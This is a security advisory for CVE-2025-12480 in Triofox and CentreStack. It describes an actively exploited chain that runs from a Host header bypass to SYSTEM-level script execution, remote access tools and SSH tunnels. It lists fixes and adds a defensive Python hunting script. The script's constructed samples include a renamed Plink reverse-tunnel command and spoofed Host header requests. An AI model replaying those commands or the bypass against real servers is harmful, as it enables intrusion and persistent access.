PT-2025-46160 · Triofox · Triofox

Published

2025-11-10

·

Updated

2025-11-12

·

CVE-2025-12480

CVSS v3.1
9.1
Vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Name of the Vulnerable Software and Affected Versions: Triofox versions prior to 16.7.10368.56560; CentreStack versions prior to 12.10.59
Description: Triofox and CentreStack contain an Improper Access Control flaw that lets an unauthenticated attacker reach application configuration pages and, from there, upload and execute arbitrary payloads on the server. The vulnerability, designated CVE-2025-12480, is being actively exploited by the UNC6485 threat group. Initial access is gained through a Host header bypass that defeats authentication on those configuration pages. The attackers then chain the flaw with the Triofox built-in antivirus scanning feature to achieve remote code execution (RCE): they create an administrative account and set the antivirus scanner path to a malicious script, such as "centre report.bat", which the service runs with SYSTEM-level privileges. This foothold is used to deploy remote access tools such as Zoho Assist, AnyDesk, and Plink for persistent access and reconnaissance; the attackers rename executables (e.g., sihosts.exe, silcon.exe) to evade detection and establish SSH tunnels.
Recommendations:
Update Triofox to version 16.7.10368.56560 or later.
Update CentreStack to version 12.10.59 or later.
Audit existing administrative accounts for unexpected additions.
Verify that the antivirus scanner path points to an approved scanner binary and not to a script or other unauthorized executable.
Monitor outbound SSH traffic from the server for suspicious connections.
Run hunting queries for the artifacts associated with this attack methodology (script execution launched by the antivirus feature, renamed executables, newly created admin accounts, unexpected Host header values).
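The following hunting script turns the exploitation chain and the recommendations above into concrete checks: an antivirus scanner path that names a script, SYSTEM-level script execution, tools renamed on disk (detected by comparing the PE OriginalFileName with the file name, as Sysmon Event ID 1 records it), SSH tunnel command lines, and requests whose Host header is not one of the server's published names. It is an added example and not code from Positive Technologies, Gladinet, or Mandiant; the request-log format, the event fields, the parent process name, the hostnames, IP addresses and every sample record are constructed for illustration, and the OriginalFileName strings used for Plink and AnyDesk are assumptions to verify against your own binaries.

```python
"""Hunting helpers for the CVE-2025-12480 exploitation chain (added example).

Log format, field names, sample records, hostnames and addresses below are
constructed; map them onto your own telemetry (Sysmon/EDR process events,
IIS or reverse-proxy request logs, the Triofox antivirus scanner setting).
"""
import re
from dataclasses import dataclass

# A scanner path should name a scanner binary, never a script: the chain
# abuses this setting to run an attacker-written .bat as SYSTEM.
SCRIPT_EXTENSIONS = (".bat", ".cmd", ".ps1", ".vbs", ".js", ".wsf")

# Renamed executable names listed in the advisory.
RENAMED_BINARY_NAMES = {"sihosts.exe", "silcon.exe"}

# Tools named in the advisory, keyed by the OriginalFileName the PE keeps
# even after being renamed on disk (assumed values; verify for your builds).
TOOL_ORIGINAL_NAMES = {"plink.exe": "Plink (SSH)", "anydesk.exe": "AnyDesk"}


def check_av_scanner_path(path: str) -> list[str]:
    """Flag an antivirus scanner path that would run a script instead of a scanner."""
    findings = []
    p = path.strip().strip('"').lower()
    if p.endswith(SCRIPT_EXTENSIONS):
        findings.append(f"antivirus scanner path runs a script: {path}")
    elif not p.endswith(".exe"):
        findings.append(f"antivirus scanner path is not an executable: {path}")
    return findings


@dataclass
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 / EDR process-creation record."""
    image: str               # full path of the new process
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str
    user: str
    parent_image: str


def hunt_process_events(events) -> list[str]:
    findings = []
    for e in events:
        name = e.image.rsplit("\\", 1)[-1].lower()
        original = e.original_file_name.lower()
        cmd = e.command_line.lower()
        if name in RENAMED_BINARY_NAMES:
            findings.append(f"known renamed binary: {e.image}")
        # PE says plink.exe/anydesk.exe but the file name says otherwise: renamed to evade detection.
        if original in TOOL_ORIGINAL_NAMES and original != name:
            findings.append(f"{TOOL_ORIGINAL_NAMES[original]} renamed to {name}")
        # The antivirus feature launches the configured path as SYSTEM; a script
        # interpreter running a .bat/.cmd under SYSTEM is the RCE step of the chain.
        if (e.user.upper() == "NT AUTHORITY\\SYSTEM"
                and name in ("cmd.exe", "powershell.exe")
                and any(ext in cmd for ext in SCRIPT_EXTENSIONS)):
            findings.append(f"SYSTEM script execution from {e.parent_image}: {e.command_line}")
        # Plink/ssh with a remote (-R) or local (-L) forward is the tunnel the advisory describes.
        if (original == "plink.exe" or name in ("plink.exe", "ssh.exe")) \
                and re.search(r"\s-(R|L)\s", e.command_line):
            findings.append(f"SSH tunnel established: {e.command_line}")
    return findings


# Constructed request-log format: "<client> <host-header> <method> <path> <status>"
LOG_RE = re.compile(r"^(?P<client>\S+) (?P<host>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3})$")


def hunt_host_header(log_lines, expected_hosts) -> list[str]:
    """Flag requests whose Host header is not one of the server's published names.

    Initial access in this chain is a Host header bypass, so any request that
    reached the application with an unexpected Host value deserves a look.
    """
    expected = {h.lower() for h in expected_hosts}
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m["host"].lower() not in expected:
            findings.append(f"unexpected Host header {m['host']!r} from {m['client']}: "
                            f"{m['method']} {m['path']} {m['status']}")
    return findings


# --- Constructed sample data (not real telemetry) ---------------------------
SAMPLE_AV_PATH = r'"C:\Windows\Temp\centre report.bat"'
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "Cmd.Exe",
                 r'cmd.exe /c "C:\Windows\Temp\centre report.bat"',
                 r"NT AUTHORITY\SYSTEM", r"C:\Program Files\Triofox\TriofoxService.exe"),  # hypothetical parent
    ProcessEvent(r"C:\Windows\Temp\sihosts.exe", "plink.exe",
                 "sihosts.exe -ssh -N -R 2222:127.0.0.1:3389 tunnel@203.0.113.10 -pw x",
                 r"NT AUTHORITY\SYSTEM", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\notepad.exe", "NOTEPAD.EXE", "notepad.exe",
                 r"CORP\alice", r"C:\Windows\explorer.exe"),
]
EXPECTED_HOSTS = {"files.example.com"}
SAMPLE_LOG = [
    "198.51.100.7 files.example.com GET /portal/ 200",
    "203.0.113.10 localhost GET /admin/ 200",
    "203.0.113.10 192.0.2.25 POST /admin/ 200",
]


def run_hunt() -> dict:
    """Run every check over the sample data; returns findings per check."""
    return {
        "av_path": check_av_scanner_path(SAMPLE_AV_PATH),
        "process": hunt_process_events(SAMPLE_EVENTS),
        "host_header": hunt_host_header(SAMPLE_LOG, EXPECTED_HOSTS),
    }


if __name__ == "__main__":
    for check, found in run_hunt().items():
        for f in found:
            print(f"[{check}] {f}")
```

Matching on OriginalFileName rather than the on-disk name is what catches the renamed tools; the name list for sihosts.exe and silcon.exe is there only because the advisory names them, and attackers will pick other names next time. Feed the Host header check with the full request log, not only failed requests, since the point of the bypass is that the request succeeds.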

Fix

RCE

Improper Access Control

Weakness Enumeration

Related Identifiers

CVE-2025-12480

Affected Products

Triofox